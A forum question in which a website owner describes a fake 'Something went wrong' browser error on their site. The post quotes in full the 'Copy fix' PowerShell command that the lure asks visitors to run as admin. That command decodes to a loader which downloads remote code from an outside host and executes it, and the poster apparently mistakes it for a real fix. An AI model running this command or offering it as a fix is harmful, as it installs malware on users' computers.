skip to Main Content

enter image description here

I’m encountering an issue with my website altaiyeb.com when accessed through Google Chrome on desktop. The error message displayed is:

Something went wrong while displaying this webpage.

There was an error during the latest update of browser version, causing some web pages to malfunction.

Follow these instructions to resolve the issue:

  1. Click the ‘Copy fix’ button below.
  2. Right-click on the Windows icon.
  3. Select ‘Windows PowerShell (Admin)’.
  4. Right-click within the open terminal window.
  5. Wait for the update to complete, then refresh the page.

I’ve tried following the provided steps, but the issue persists. Here are some additional details:

  • The website works perfectly on mobile browsers.
  • The issue is specific to desktop browsers.
  • I’ve cleared the cache, disabled extensions, and ensured the browser is up to date.

Steps Taken:

  1. Cleared browser cache and cookies.
  2. Disabled all browser extensions.
  3. Tried accessing the website in Incognito mode.
  4. Updated Google Chrome to the latest version.
  5. Reinstalled Google Chrome.
  6. Checked for conflicting software.
  7. Tested the website on different desktop browsers (Firefox, Edge).

Observations:

  • The issue is consistent across different desktop browsers.
  • No problems are encountered on mobile browsers.
  • Console logs indicate multiple SyntaxError issues related to JSON parsing.

Code Snippet (if applicable):

console.log('Data before parsing:', data);
try {
    let parsedData = JSON.parse(data);
    console.log('Parsed Data:', parsedData);
} catch (error) {
    console.error('Error parsing JSON:', error, 'Data:', data);
}

Any insights or suggestions on how to resolve this error would be greatly appreciated. Thank you!

And When I click on Copy Fix:

            ipconfig /flushdns
            $Data = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JGc5MUYgPSAnaHR0cHM6Ly9nYW1lLmVtaWxpZWJvdWNoZXIuZnIvY29udGVudC9maXguaHRtbCcKJHYzOEsgPSBAeyAnVXNlci1BZ2VudCcgPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMi4wLjAuMCBTYWZhcmkvNTM3LjM2JyB9CiR6MDRRID0gSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZzkxRiAtVXNlQmFzaWNQYXJzaW5nIC1IZWFkZXJzICR2MzhLCiRjb250ZW50ID0gJHowNFEuQ29udGVudApJRVggJGNvbnRlbnQKY2xlYXItaG9zdAo="))); 
            $DUMP = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw=="))); 
            $LIC = $Data + "; " + $DUMP; 
            Invoke-Expression $LIC; 
            exit;

2

Answers


  1. I too got this message today
    I host my website through hostinger, is it a major issue

    Login or Signup to reply.
  2. I am also having the same issue on my website mrsdownloader.com I have applied every setting that you mentioned above and i have also contacted my hosting support they said it’s a malware of something else but i haven’t found anything in sucuri scan, wordfence scan nothing found.

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search